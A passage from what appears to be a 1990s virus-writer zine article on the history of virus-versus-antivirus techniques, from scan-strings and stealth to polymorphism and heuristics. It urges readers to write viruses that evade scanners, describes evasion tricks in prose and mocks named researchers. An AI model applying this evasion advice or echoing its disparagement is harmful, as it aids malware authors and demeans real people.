avers easily detectable virus that fits to their scanning schemes makes no problem to detect and remove if it appears in the wild. It only depends on how soon the unknown virus (up to that time) infects someone's computer who can find out there is a virus and can see some changes and send sample to some av company. The usual way (just think) is to put it to some directory to analyze it. It depends how much people familiar with viruses they have to process all the samples they have. As many times there is a lot of rubbish in such incoming files, damaged files, and viruses of course. Some minutes, hours or days later virus is roughly checked (usualy not analyzed as complex analyzis tooks lots of time) and a scan-string (or whatever they use) is selected. If it is as easy as mentioned, it doesn't take lots of time. The more it is complicated the more work it takes. If it takes so much work, or they do not understand it at first look, one puts it into some group for later processing (if they will have some free time but they usualy have not if there is too many new viruses). If it is more important - for example it was reported in the wild, or customer have this virus, it must be processed immediately (or sooner, let's say). I will show another example here - well known Slovak virus One_Half (it has several variants, but forget about them for now): it appears in Slovakia and local anti-viruses had to fight him, even as it was a bit complicated (the better is to say non-standard) to detect it. But there were no need for big foreign companies (like Dr.Solomon's Toolkit) to add this virus to scanning as it was non-standard - it was not so easy to add it, so they don't. Even dr.solomon was sold in Slovakia, but it wasn't able to detect One_Half for a months (only some selected samples that were in virus collections, but no others ;-). When this virus gets out of Slovakia and infects other countries, it becomes a problem for av companies and they have to solve it - if it is standard or not - customers are requesting it. It takes up to weeks or months for some to do so (also because One_Half appears in In-the-Wild test set of VB). This ignorancy helps One_Half to spread a lot until they were able to detect it successfuly. Was One_Half so amazing and great? In fact, it wasn't. It has only two unusual things that made him famouse - the rest of it is rather simple and uninteresing. The first one (more important for detection) is something what I call distributed decryptor. It is rather easy but it beats the principle of scanners - that's why it was too hard for them to detect: decryptor consist of 10 instructions (all fixed) but they are not at the same place (or chunk). Each instruction surrounded with couple of rubbish instructions (choosed from 10 one-byte instructions like clc, stc, sti, and some other simplest ones) with jump is placed at random place in host file. Jumps connects them in order to keep execution loop. Very simple, isn't it? One can very easily detect this virus. But avers weren't able to. As it doesn't fit their scanning schemes - they weren't able to detect it without writing special aditional routines. And they are busy and lazy, of course (as everyone is). Another unusual thing in One_Half was slow encryption of disc. Each time you reboot, it encrypts two tracks of hard-disc starting from the end (don't think about some strong encryption! it is simplest xor with constant word value) but as long as you have virus you can't notice anything because it (same as if you have a stealth) on fly encrypts-decrypts data in encrypted area. But if one remove the virus, there is no more on-fly decrypting and part of disk is left encrypted (xored, in other words) and user can't access files, etc. This was also untraditional and simple removing leads to reinstaling of disk - and avers have to prepare special routines that decrypts disk as well (some of them doesn't even up to now, but One_Half is over in these days). But this is not what I want to appoint, as it indirectly leads to destruction. What you should take from this story? No matter how your virus is complicated or bombastic, it is only valuable if it can complicate life to avers. Thats it.
flush
Tie your seatbelts, prepare for long adventure through virus history. I will list basic principles of war between viruses and antiviruses to show you how the story was going on. Most probably I will not be able to keep it in chronological order but I try to use logical order, to show main technologies and counteractions on both sides.
The story begins long long time ago (sounds like a fairtale, isn't it?) when first viruses were written. Doesn't matter which one exactly it was, the more important is that some of them appears on user's computers. At that time this war begins and it is continuing and growing up to now.
The Begining No matter how big invetion were first self-replicating algorhitms, viruses are not first programs that were able to do so. It started with worms and other hardly-clasifieable pieces of code a time before virii. But viruses make change and normal people having computers becomes infected. The very first viruses all follows one of two basic schemes. File and boot viruses and some of them survives up to now. Old boot viruses are quite simple: they are spread in boot sector of floppy discs, and on booting from such a floppy it copies itself into partition table and becomes resident (useful if there is no hard disc in computer). Once it is resident, it infects bootsectors of all floppies beeing writen. Thats all folks, all it fits into one sector. Michelangello or Stoned fits into this class. File viruses like Jerusalem uses simple appending parasitic infection, infects com or exe files (or both of them). When infected file is executed, it usualy becomes memory resident and infects all executed files since. Some of them even don't have double-infection check (like Jerusalem) and often runned programs can become quite long. I think all you know basic principles so I'm not going to explain such a trivial things. At that time situation was quite easy. May be some of you seen, for example scan19 - yes it detects 19 viruses! There were really few viruses at that time. How to deal with tivial viruses? Well, first antiviruses were really stupid and slow. Any program is and unique sequence of instructions - that something what every programmer understands. But what one (aver) can do if he (usualy) doesn't understand file structures? The result were simple algorithms very simmilar to searching for text in text editor - a whole(!) file is checked for specified string. This is origin of name "scan-string" which is a fixed sequence of bytes choosed from virus body. Moreover, some of first antiviruses scans file as many times as many strings they have. One may guess it is quite unefficient and slow. Sure! But at that time disks were really small (and computers slow as well). This technology was biggest invetion in order to fight viruses ever, I can say. It survives up to today but in modified forms - as viruses are still using fixed code (plain or encrypted or whatever) and they can be easily identified this way. Antiviruses are bussiness. A big bussiness if one have a look at NAI. Beginigs were quite different, as many independent (free) antiviruses were available just to help people. But one can't stay competition with big money - look at Microsoft to see why. Today, to keep track of a big number of new viruses a many peoples are needed to work on antivirus for a full-time, and everyone needs money. And people have to buy (or support) antiviruses as they affraid of virus. Many people around the world things that viruses have to destroy something - thats why they don't like viruses. But noone cares that Windows crashes caused much more destruction than viruses. Because it is normal. Weird, isn't it? Well, this fear of viruses was started with biggest computer virus hoax ever, initiated by McAffee - in order to
make money, of course. It was Michelangello couple years ago, may be some of you remember it: McAffee informed about upcomming big computer dissaster caused by extremly dangerouse virus Michelangello. They estimated 20 milions of destroyed computers at activation date. 20 milions were too big number even in those days as there weren't as many computers around the world as today. This hoax comes from publisher to publisher and it grew bigger and bigger - and information about this computer apocalypse appears in many countries. I remember dady of my schoolfellow forbid him to turn on his computer (Sinclair ZX Spectrum with 8 bit Z80 cpu!) because a virus can came to is through network (power network of 220V!) and it can be destructed. Wow! Unbelieveable, isn't it? Even more that repair disc destroyed by Michelangello tooks few seconds with diskedit. But noone mentioned it in this hoax, of course. As activation day passed, everyone understoods I hope, too few computers were destructed (comparing to 20M) but this hoax succeed: people starts really affraid of viruses, and antiviruses are sold worldwide - they become a big bussiness.
Old techniques of scanning (scan-strings) I already mentioned first scanning methods, based on scan-strings (sequence of bytes selected from virus body). If they are found in file, it is marked as infected. Some of first antiviruses scans whole file for such a string, but later on they scanned only some specified area usualy used by viruses: begining of the file, end of file, and/or around exe's entry-point or com's first jump target. Usualy aproximately 6kB were (or are) scanned - it is quite little to load it fastly and quite enought for most of viruses - at least part of body should be there. Scan-strings are checked at every position in loaded buffer, scanning is at suitable speed. Here should I put little discussion about scan-strings and how to choose them: at first, I will mention other forms of scan strings later on. Choosing scan-string is not as trivial as one may guess. At first, such a string have to be in loaded buffer in any case. Scan string should be as short as possible (in order to save space and scanning time), but as long as possible at the same time (in order to detect only this virus with no false possitives). This sequence should be typical for virus (preferable this virus only), and not to be found in any other regular file. If does, it is called false possitive identification. It is rather difficult to have no false possitives with many short strings - as there are many programs and one simply can't have them all. An example of really bad scan-string is e.g. E800005x, it is short, really typical for viruses. All you know basic opcodes I assume from head, but I'll translate it to: call $+2, pop xx. But it can be found nearly in any virus, and in many regular programs written in assembler. Hope you got the point. Another discussion is if this string should identify more viruses at once, or one-and-only. If it identifies for example huge part of Jerusalem family, it is advantage that it may identify also new mutations. But it is not suitable identification for cleaning, as they partialy differ from version to version. Today's trend is to have as exact identification as possible. But even today it is not possible. This leads to another extrema, typical for Dr.Solomon's Toolkit: to identify versions even it there are not. An example: virus named Z (pure fiction), there is only one version in real, but in aver's collection it is separated into Z.A and Z.B, and solomon identifies them as two versions but most of others not. But if you take Z.B infected file and replicate it, it is caught by solomon as Z.A. What's going on? Well, they have selected scan-string also from host file. Usualy noone takes care as avers in many cases are not replicating files and only some selected samples are travelling round the world - so they may get 100% hit rate on some virus - but only in virus collections avers have and not in real life. Remember this: they have only few samples (usualy), and whey are not active (not executed). The Tremor story later on tells you why.
Early battles - fooling simple scanners Situation stabilizies: there were some viruses, but avers weren't able to beat them completly. Moreover, once it is bussines, they don't want to win this battle totaly as there will be no war anymore and no bussines anymore. Think with me: scanners were available and finding viruses at suitable rate. Of course there are still peoples not using updated scanners all the time so viruses can survive, but new viruses once they are found are added to scanners and can be easily identified. Too bad for virus-writer spending days or weeks to
create nice piece of code to be breaked in a minutes. You have to invent something. There were two answers - stealth and encryption.
Stealth counter-attack Now let's think how scanners works in that time: scanner runned on computer infected with virus opens each file and checks it for some id string. How you can hide? You can become "invisible" once you have total control over computer (elementary under DOS) and hide files beeing scanned. This is called stealth (due to U.S. Bombers B-2 called "Steath" - invisible for radars) and we may talk about two implementations for files: disinfection on-fly (each opened file is disinfected and again infected on closing) and true stealth (all file operations are checked and modified). And for boot viruses a sector redirecting is used. Computer is infected with stealth virus. Virus is active in memory, user runs his favorite scanner and it is searching for strings in files - but as it opens files with viruses, it can't find anything as virus hides itself. Nice, isn't it?
Memory scanning Imagine you are an aver (as you have think for both sides, otherwise you can't rule this war) - what would you do with stealth viruses? Simplest answer is to scan memory as well, and if virus is found, ask user to boot from clean floppy and run scanner this way - then there is no virus in memory and all is as before with regular viruses. Easy easy. Memory scanning in old times was simmilar to file scanning. All memory is checked for same strings as files, if found - a virus is reported in memory. To speedup the things some antiviruses doesn't scan whole memory but only possible locations - they may skip ROMs, antivirus itself, etc. But it differs from one implementation to another. Memory scanning is not a big technical mirracle. Once virus is found, some antiviruses were able to patch virus to be inactive and to continue without need to boot from clean floppy. But due to many viruses appearing later it is not usual to do so today as there are too many viruses and you can't write such a routines for every of them. AVP, for example performs such a activity even now, but only a for few most common viruses. However it is quite userful for lazy users. Inactivating can be done easily by replacing virus handlers with jump to original entry-point of hooked interrupt. Also usualy a virus body is erased (except jumps of hooked interrupts in order to keep interrupt chain functional) not to report virus again. It must be done in interrupt-shield (cli) of course to protect for asynchronouse break-downs. Another idea how to partialy inactivate virus in memory presented by some antiviruses is known-entry-point methhod. There are two basic interrupts under dos: int 21h for files and int 13h for sectors (boot viruses). If you know the original entry point (you know this version of dos or you have stored this entry-point at installation process) you may find out if some virus is in memory and you can access functions without virus' influence. Of course, for int 13h you must check not for real interrupt pointer as it points to DOS, but for internal pointer in DOS that points to ROM as boot viruses are loaded (and hooks int13) before DOS does it. But this technology in general has many weak points and it is forgotten today. As even legal programs may redirect those interrupts because Microsoft designed its "OS" this way. For example caches, networks, etc redirects this interrupt. Novell netware for example uses redirecting int21 instead of MS's recomended network redirector facility for network implementation (because it is implemented in versions 4+). If you call int21 entrypoint directly you can't scan Novell's disks. This technology caused many crashes and is unusable in generic case, you may check my another article about this: why not to use direct disk access which deals with these things.
Encryption Once stealth viruses can be found in memory, another tryies comes with encryption expetiments. It started with first encrypted viruses that had main virus body encrypted but there must be at least short decryption routine. And this routine is still a fixed sequence of bytes - and it can be identified with a scan-string. One may guess there is no improovement. Actually, not a big one, but it starts development in this direction.
Wild-card scan-strings Situation complicates a bit. Avers are forced to you one scan string, for example only fixed 16 bytes of decryptor. Btw: some stupid avers choosed scan-strings from virus body - e.g. xored each time with another value, so they were able to catch only samples they have, but nothing else :-) Well, let's think about simple xor routine, quite fixed, however there are several variable bytes: encryption constant (let's talk about one byte) and starting offset. As they are not at the same place, the 16 bytes of decryptor (pure example) is broken into 3 chunks of fixed bytes, biggest of them let's say 6 bytes long. And avers have a problem: 6 bytes are really not enought for scan-string, as they are not absolutely unique - part of unvaluable loop can be found in other programs (see discussion on scan-strings above). Oops, how to deal with it? (Think once again as aver) What would you do? Once you have some technology implemented, functional and tested it is best for you to use it at maximum. Scan-strings ... well, how about wildcards? Thats it: all you need is to have one-byte substitution like '?' in shell patterns. In this case you can have still 16 bytes long scan-string with 3 variable bytes. It fits the requirements and all is as before - you have a scan-string to identify virus, all is okay. The most important is they were able to deal with it, but it tooks some time - and it gives viruses possibility to be spread. This is first implementation of wildcards in avir's scan-string history, but not last change in scan-string methodology of course... Another problem that appears here is encryptor vs. body dilema. Once it identifies virus by encryptor only, it can't make a difference between versions, moreover it can't make difference between different viruses with same (or roughly same) decryptor. Well, cleaning problem can be solved by easy de-xoring by cleaning routine - you must to do so if you want to clean encrypted virus - and you can check the difference after decrypting. But this is important change in methodology - as there no exact identification before cleaning and identification must be done once again at cleaning process in different conditions (a cleaning routine or scanner executed once again can do it). This problem still remains and I will return to it later on with MtE.
Variabilizing encryption Avers handled encryption with wild-cards, you have to think about something new again, unless you want to be caught in a days. Once virus have some simple encryptor, you can improove it a bit: you can increase variability not to be handled by '?' wildcards by inserting of nop's or any simple junk instructions. Then your decryption instructions are not at fixed distances and simple wildcards will but be able to handle them. For example, if you have two fixed instructions together, a scan-string can be choosed from both of them. But if you insert 1-5 nops, scan-string with '?' will not deal with it (unless there are 5 scan-strings ;-) Simple, and it can't be handled by current methods.
More wild-cards How avers can find such encryptors? They implemented another type of wildcard for it - '*' equivalent for variable number of random bytes. It tooks some aditional work but it as handled. Depends on implementation how many random bytes they allow - if it is fixed, or a limits are included in scan-string, or whatever. Scanstrings becomes differ from avir to avir. They were still able to handle all viruses with scan-strings but there become a big number of strings to be used that slows down scanning itself (today it looks like a kids game but viruses were at much the lower level than now too). Some avirs starting using some hierarchy in strings, methods of strings and substrings (smaller set for generic identification and if found, more detailed set), presorting of strings into radix-tables, etc. It depends but all of them follows basic principles and fulfills the requirements. Interesting idea to speed-up scanning process is single-point scan-string, checked at fixed relative offset to some important file position (e.g. entrypoint, file start or file end). Such a string can be shorter, as it is checked only once at fixed offset (comparing to strings checked in whole loaded part of file) that decrease possibility of false attacks (and it saves memory as well). It is much faster to scan for such a strings, and it is
easier to distinguish between versions. If a single-point string is well choosen it can be only 4-6 bytes long, comparing to 12-18 bytes of regular string.
Way from variable encryption to metamorphism Once you are modifing a decryptor with some trivial junk instructions (there is no reason to put there some harder one, as all was needed to beat fixed strings, and nops can do that as well as other instructions) you can do even something more. Scan string is fixed sequence of bytes, but if you change and indexing register, it becomes different sequence of bytes. Decryptors started to change in every infection, changine indexing register, decrypting instruction, loop method, etc. Encryption scheme is pretty visible, however it slightly increases byte-level variability up to level when even wild-card scan-strings can't be used at all, or they can't be used at suitable reliability. This is something we can call variable encryptors or metamorphism - everyone call it in different way, avers clasify it even as a low polymorphical engines in order to show how clever they are. However, now there were no matter of junk instructions (are there or not) once valueable bytes of decryptor instructions can't be checked. It was presented in many forms in viruses and it requests new answer from avers.
Algorithmic scanners is the name of technology they present. As tries with mask for scan-string (to filter-out part of byte beeing variable) doesn't show suitable results, a something new had to be found. Scanners started to use (parallely) short routines to distinguish if piece of code is a known decryptor or not. It checks for some code sequences or forms, if it fits hard-coded requirements, file is reported as infected by virus. Usualy they had as many algorithm routines as many decryptors they want to recognize. As scheme of encryptors they are checking for follows really easy rules, it can be tested with satisfieable results for positive infection. Simple encrypted viruses were checked this way. But most of top avirs are not using this for trivial virii now (some of them does, i.e. Avast! which always (ok, usualy) rates in VB's 100% award group - but you can see tests - it can't identify even simply encrypted viruses exactly). So most of top avirs are using some kind of tracing (i.e. emulating) because it is required today to handle many of complicated viruses, in some sort of generic decryptor - routine which is able to decrypt simply encrypted viruses (or more complicated, it again depends on implementation).
Inoculating It was another interesting things antiviruses offers in old times - may be some of you remember for example TNT Antivirus (it is gone) that does it. Functionality is simple - viruses usualy uses some marks to tag which file was already infected, not to infect it again. (all this is nearly same for boots/mbrs). All you are using some variable set in file, or virus body (some bytes) already found in file, or changing time/date of file. By inoculating those atributes are set and virus will not infect it again. Sounds nice, but unfunctional in general :) In that time there were not as many viruses, but it becomes imposible too - you simply can't inoculate files agains all viruses. If they are checking for seconds of modification there can be two different viruses that set it to two different values, so you can't cover both of them. Yes, viruses aren't testing files only for their flags, but for some limits too. But some of them you can't fake - for example some values in exe header, or overlays (program might become unfunctional). These are the reasons why it can't be used for large number of viruses or for all viruses - it can be done for one or some small number of viruses. Moreover, noone todays spends a lot of time with analyzis of viruses today - most of them are analysed in a short time, and you have to know them completely to do inoculation, otherwise it may damage inoculated files. Well, in other words I don't think there are any reasons to take care about inoculaton today.
"The Final solution"
This way some av companies called their antivirus systems another time ago. They presented "the final antivirus that can deal with every virus without knowing it". Sounds good, isn't it? And it is more-less true. Do you have any idea what is it? Well, checksumming, thats it. Idea is simple, and it works in many cases: all files that can be infected are chekcsummed (some kind of crc is calculated), plus filesize, some bytes from header, entrypoint, etc are backuped. Then, if virus infects some file (it must not be stealth) a change in lenght or contens is detected. First checksummers were really slow, as they checked crc of whole file, and it takes some time to load it. But it can be speeded-up rapidly by checksumming only important areas (header, entrypoint, fileend) with same success. Well, once some change is detected, file can be repaired by trying some of available repairing schemas (typicaly there are only few of them how viruses inserts itself into file) and if result of some of them matches original crc-s, file is successfully repaired. Sounds nice, but it has several problems (lucky, lucky): at first it can't even detect stealth viruses. But if they are not in memory, they are still valueable. Another big problem are lazy users - because most of them are using (and downloading) antivirus only when they have some suspect or if they are really infected - and there is no sense to make crc snapshot of infected files ;) And finally, there are still viruses (and this is how you can avoid checksummer's success) that are not infecting files standardly, or modifies some bytes deep in host code, or whatever that doesn't match implemented schemas. Checksummers didn't get a big success for these reasons, but they are still useable in many cases and even more, with combination of heuristical cleaner they can be more efficient. But there are still lazy users which are not using antivirus until they are infected. Because of it this can't be a really big weapon against viruses in global. But there are still antiviruses are using it, and can reach a big efficiency of detecting and cleaning.
MtE breakthrough - polymorphism Dark Avenger, world most famouse virus writer from Bulgaria, become famouse mostly because of a 3kB long object file he released. It is known as MtE 0.9 beta (short name of Self-Mutating Engine) which made many avers not to sleep for many nights. This smashing breakthrought was many times plagiated by some virus coders, but I think it was never (or nearly never) as good as MtE. What it was? Imagine situation of scanners before: all were based on scan-strings with wildcards, at most some easy checking routines (usualy not). But Dark Avenger informed the world in FidoNet message-group (I don't think that some of current guys on scene remembers fido) about his library that that can encrypt virus in 4.2 bilion different ways (4G you should understand) that can beat all scanners. Moreover it was real. MtE started new era called polymorphism. It was able to generate a decryptor containing many instructions withou visible schematics in it. Random maps of registers, several accessing modes, fake codeflow alternatives, all was so unusual. Only schematic thing was end of loop - usualy dec/dec/jnz sequence, as avers decided there is always this sequence. Most of them thinks it also now because Bontchev said so, but there isn't :) I got this result on thousands of generated samples I made - with some probability it creates other loop instructions sequence. MtE 0.9 was distributes with sample virus - non-resident com/exe infector, which was many time patched by lamers that are not able to write its own virus (with MtE library or not) and many very-simmilar viruses with MtE appears. A usual name of sample virus is MtE:Dedicated, because it contains a string: "This virus is dedicated to Sarah Gordon who wanted to have a virus named after her." (hope I remember it right). Here we have - famouse and hated (and foolish) Sarah - even guys from av scene doesn't like her theoretical stuff, but they can't say it clearly as we can :) She became famouse (except it is a woman ;-) due to her investigation about virus writers and their origins. Funny but unusable and she sure hopes it is forgotten now ;) Well, but back to MtE: Also library MtE 1.0 appears in the world, but it was nearly forgotten as it doesn't bring new features, and most viruses are using original version 0.9.
Algorithmic scanners once again MtE goes above the limits of old antiviruses and presents some completely new idea they have to fight with.
Some unreliable detectors appears that checks for some secondary flags, like entry-points, or some codesequence, or file-tagging, but they weren't quite functional. It tooks rather long time (months!) until a good detector was written and build into antiviruses. Partialy at that time it tooks many days until virus can get from country to country - unlikely today. But no matter of that there were a big compentition between antiviruses to catch all samples of MtE. A many independent test were made (it was never before or after) testing antiviruses on thousands of samples if it can find all MtE samples. It tooks lots of time to all antiviruses to reach 100% hit-rate. Again a question of exact detection appears. Recomentations of CARO suggested the sollution (and some antiviruses follows it, like TBAV in that time) that polymorphic library should be part of virus name, separated by semicolon. For example MtE:Pogue.A - rest of hiererachical virus name should be dot-separated as before to display versions/revisions. However, it was quite difficult for avers to decide if there is a MtE encryptor at all, they weren't able to go under this generated encryptor. How they were detecting MtE? Well, a algorithmical scanners were this solution once again. But withou visible schema it wasn't so easy. Most of antiviruses used (and mostly they are using also now) an acceptage-disassembler. The idea is simple: MtE generates only some instructions, loop is always terminated by dec/dec/jnz (well, not always, but no matter now) all you need is to know is given instruction can be generated by MtE and the size of instruction (to know where the next instruction is). If a jnz is found, you need to check if it is in backward direction and there are two dec-s before it. Well, and to solve conditional paths - just try to pass both of the using recursion. If test is passed and backward jnz is found, a MtE virus is reported. Such a test is fast enought, hits all infected samples and has no (or really really little) false positives. And it can be as little as a bit more than 300 bytes as it is illustrated in TBAV. Thats why some of antiviruses can't report exactly what virus is encrypted by some polymorphical library they are checking (usualy) if decryptor can be generated by coresponded poly engine. This technology is intended to be non-destructive analyzis (not to load this code once again) in comparison with emulation.
Plagiating MtE - polymorphic era Success of MtE was never replicated. At first I think none of routines were as good as MtE, they were different - as usualy noone understoods Darkie's code. But to be as successful as MtE it is not enought to write a good polymorphic engine - this is something I want you to understand - as current avir technologies can handle polymopric viruses mostly without problems. To be as successful as MtE one have to make simmilar breaktrough - something that is incompatible with current thinking of antivirus guys. When MtE kicks all the avers pretty hard, a many virus coders started to write simmilar engines (as once MtE was already detectable). First one I remember was TPE - Trident Polymorphic Engine (released by Trident group). There was a big fear from AV side of it because all they sill remembers MtE's fear. However, TPE wasn't as successful as MtE in world becase most of viruses weren't spread enought to be important. TPE technology was a bit different than MtE's - it uses several schemes of main encryptor, picking one of them plus some number of introduction schemes placed before encryption loop. It was rather schematic, but there were many schemes so it wasn't visible for the first view. Hovever, some detecting routines used simmilar algorithm as for MtE, some detected each scheme in encryptor and checks it. In general, TPE as handled much easier by avers - as they knew how to deal with it already. I will not make big differences between each polymorphical engine as they are principialy unimportant. Some engines were really easy piece of cake for avers, some made them a lot of problems. Some noticeable poly engines usualy only reach some limits of antiviruses but never goes above them - thats why other poly engines weren't so successful - because MtE settuped a rather high limit. I can show you it on SMEG - all why it was so dangerouse for avers is because it can generate a really long decryptors. Well, a big fear of avers can be, if many polymorphical viruses (or engines) appears in a short time, each of them non-trivial (on some of limits of scanners), it will be really hard to implement specialised scanning routines for all of them, if they are reported in-wild.
Heuristics Well, this is a another big chapter, developed together with other technologies. A time ago, heuristic was only a experiment how one can catch unknown virii. But wasn't quite relieable, widely it was introduced by TBAV (sure everyone knows). As we have completely dedicated article to this topic I will not describe it here - only to describe its reasons and influence in history. Finally, with more and more viruses comming each month, some avers tried to find out something that can detect even those they are not able to add so fast - to detect unknown viruses, in general. In fact it has same proposal as checksumming already mentioned. For a long time heuristics was some kind of avers alchemy to improove their hit-rates. It was magic that everyone admire (avers, virus-writes, gurus, coders and regular lamers), but noone trust. Funny, isn't it? First for wide public, surely not best, and mostly fooled by viruswriters is TBAV. TBAV puts all its power into fast heuristics but it has primary weak point - it was passive instead of active (disassembling instead of emulation) and it wasn't able to go through encryptors. Another bad thing for TBAV were displayed flags so anyone can see what internal flags were found on given file. And using documentation you can find out what TBAV suspects on your virus - and you can tune up not to be detected by TBAV easily. Soon many viruses started to be anti-tbav that means not detected by tbav's heuristic by default (today it is some sort of standard). It is too bad for heuristic - as it is designed to catch new viruses, but if they are all designed not to be detected by such a heuristic, there is no way to do so. TBAV's heuristic finds its death in these things. TBAV (followed by some plagiats) uses, as I already mentioned, a passive method or disassembly (in other words) that analyses code (instructions) and detects some suspecting schemas - like setting registers and calling interrupts, etc. There were a lot of flags (nearly for every letter of alphabet) for many things and they are detected in different ways. But it was rather easy to fool, simply if it looks for mov ah,40 int 21, all you need is to do mov ah, 3f inc ah int 21 and TBAV will not complain. For this reason anviruses that still uses passive analyzis as main weapon combines it with register emulation (tbav as well) that can (a bit) keep a track of values in registers. When int 21 is found, for example, a 10 instructions before are likely analyzed to find out values of registers. It works in many cases and do not work in many cases as well. Most funny thing was decryptor detection. It didn't work in many cases, and then tbav runs to detect instructions from encrypted area - and usualy it founds many suspected instructions there of course. Well, I'm not here to judge TBAV or other avir, for this proposal we have another article. Another more powerful heuristic is presented by AVP (but it is usualy hidden as avp displays regulary detected viruses at first), by DrWeb and Nod-iCE. They are using active heuristics (emulating as much as possible) and are able to detect much more suspected activities. Also, you don't see any flags there, so it is harder to fool them. But AVP's heurstic as well as Dr.Solomon's are setuped to be less-sensitive as they can detect plenty of viruses by scan-strings and they do not need to be as successful on uknown viruses as others. For this reason of course they have less false-positives as well (our experiments some time ago shows that hit-rate of Dr.Solomon's heuristic for example is round about 70%). Active heuristic (emulation) is destructive to code, as it emulates as much as possible, and it must be trickily combined with scanning. But it simplifies scanning as emulation can simply go through decryptors and then av can detect virus exactly as it is already in decrypted state. For this reason it is also called as genericdecryptor in some antiviruses - if they are using emulation only for this. But heuristics finally after years of beeing unsure becomes a standard, and as it is showed by Nod-iCE and DrWeb, it can be really relieable. This what emulation gives us. However top antiviruses today uses combination of both methods. Weak point of passive heuristic (or disassembly) is disassembly itself: there is difficult to find out values of registers even in simple cases. Of course it depends on implementation of heuristic. Also any encryption, or data-depended or highly-structured code can't be understood by disassembly-based heuristic scanner. As heuristic scanner looks for typical structure of instructions of viruses (searching for executable files, accessing and modifying them, becoming resident, etc) do this things in some tricky way, not clearly and
visible. To fool emulation is much more difficult. Emulation typical executes code of virus, like in regular computer, establishing some circumstances and testing if code is performing usual virii activity. At first, emulators are limitied by its definition - they are much slower than regular machine, so long decryptors or routines jumping long time each to other are aborted on a timeout - because heuristic can't hang for a long time on one file. Then there are limits of processor - only one type of processor can be emulated (more-less) perfectly. You can test processor if it works in the way it should: undocumented (but mostly unknown!) instructions, may be some badly implemented instructions in their emulator (its hard to find). However, it is just work for couple of minutes for them to implement another instruction. But there are also other limits - machine can't be emulated completly: entire of file can't be loaded (imagine loading 500k exe file), virtual machine doesn't work like it should - many of interrupts may not work, things doing by other parts of system are not also completly emulated, i/o ports usualy doesn't work (may be some easies of them are emulated, but they can't work with all of them), etc. Hardest for avers should be reaching limits of emulator, because they can't extend their limits every time: memory length, file loading, emulation speed.
Cracking Windows Have you ever crack a window? Just take a rock, and throw it to the window. Easy, isn't it? All right, I'm not going to write about it, but about real Windows - Microsoft's revange to the rest of the world. Time ago, with Win3.x world was devided between ones that doesn't like Windows (or even hate) and to the ones that likes Windows. (who of them used it, it doesn't matter now). Simmilar it was at the virus scene - most of them stayed at DOS level for three main reasons - there were no need to write for Win and DOS was good enought, it was less documented and finally many of coders weren't able to code something for Windows. Now it is a bit changed. Microsoft rocks the world with Windows 9x and turned everything to be PE-ized. Well, history repeats:
Windows 3.xx First Windows viruses were simple examples. At first, a file format is a bit changed - NE has extra fields, there are different circumstaces in protected mode, but interrupts still works and things are more-less similar. So the first viruses were simple non-resident infectors. And all avers needed to do is to implement scanning of secondary entrypoint in NE. Virus was pretty visible, simple scan-string can be used. Later I remember a big rumours about first resident viruses in Windows. A many discussions started if viruses will stay under DOS or will move under Windows. Today I think all you know whats true. But Windows are more complicated - there are more files beeing target of infection - DLL for example, and more things to infect in them. Interesting example was virus that infects exported labels in DLL, for example exported function XyzA, instead of regular entry-point was infected. What scanner must search for in this case? It has to go through all the exports! And there can be a lot of them that will decrese speed of scanning rapidly. It is still interesting idea. Only way it was handled by avers was scanning file-end (what they usualy do) for string, and oops virus is there. But if the things are more complicated to scan, some encryption for example or not to be located on some easy determinable place - it will be really bad for avers (they'll have to emulate code at every export label). Memory scanning is also not possible in a way it was for scanners. Under Windows 3.xx one can do what he wants - some viruses for example for this reason goes to Ring 0, but antivirus can do the same to scan all the memory. But there is of course more memory to be scanned and it is rather slower. Today memory scanning in Windows is not that prefered. Instead of it, a resident scanners are used more widely, as they are more consistent now with operating system (Win 9x) and there is not as big hunting for memory as it were under DOS with Bill's world famouse 640k limit.
Windows 95/98
was a real Microsoft's smash. Some of users tried to ignore it, but time shows that Win95 changed the world - everyone start using it. Today virus writers must to focus on this platform, because there are lot of users. First tries for Windows 95 started at the time when only beta version was available. VLAD promptly prepared first virus for Win95, and they spend a lot of time with exploring the details - it was Bizatch (by Quantum/VLAD). But their virus did not work under final Win95. The reason why it didn't work is simple - may be some of you know book called "Inside Windows 95". A lot of userful things regarding windows internals is published there - it was also published before Win95 was released. For this reasons, programmers at Microsft got order to changed some important things in Win95 to be incompatible with the book already written (to deny access to internal things). Also magic numbers of imports were changed there, and imported label for example FileOpenA was no longer correctly linked at load time. Another interesting is a Bizatch story. Because avers has access to beta version of this virus (well there are some guys at virus scene that can trade internal things with avers without remorse) and they firstly assumed it is not functional. Of course, a real version they also got later on. But they named it Boza (well, all-aroundthe-world-hated Vesselin Bontchev (even avers hate him because of his ego)) - because he doesn't want to please a virus author. But - CARO rules (setuped by Vesselin!) says that if virus calls itself in some way, this name should be choosed primary. And Bizatch is: "Please note: name of this virus is [Bizatch] written by Quantum of VLAD". Instead of it Vesselin find a name Boza (from bulgarian alcoholic drink) - with no connection to original virus (this is the worst case suggested by CARO naming rules). Everyone at the scene was angry about avers, of course. Forget about flame wars now. Scanning - that what is interesting. Windows 95 were 32-bit, but format they used - PE, was used even time ago. Windows NT 3.x used it as well as win32s extension to 3.xx versions. At first what one can expect from 32bit file format - all offsets and pointers are 32bit, of course. Other principles are more-less simmilar to NE - there is primary entry point, several segments can be defined, many exported functions (for 32bit DLLs), etc. But things are same as before - to scan for simple virus (non-encrypted) all is needed to load entry point of file and scan for some bytes - all is as before, only PE loader is needed. Now let's see what weapons avers have against the Windows viruses. At first we have a look at oldies scanning methods: scan-string scanning can be used in a same way as before. Checksummers may also do its work but a PE (or NE) schemes must be implemented there. The hardest part is heuristics and generic decryption (well, or both at the same time). For PE a 32bit emulator must be programmed and at the present time I don't know about any antivirus having it fully functional DrWeb is preparing it, but not yet... For this reason current heuristic engines uses for 32bit PE only passive heuristics (some kind of disassmbly). And thats why there aren't generic decryptors and each polymorphical virus for Win9x must be handled separately. But all Win9x viruses can be detected by its decryptor and - there are not many polymorphical viruses for Win9x that are principialy different so at the present time a generic decryption is not as urgent as it was for DOS.
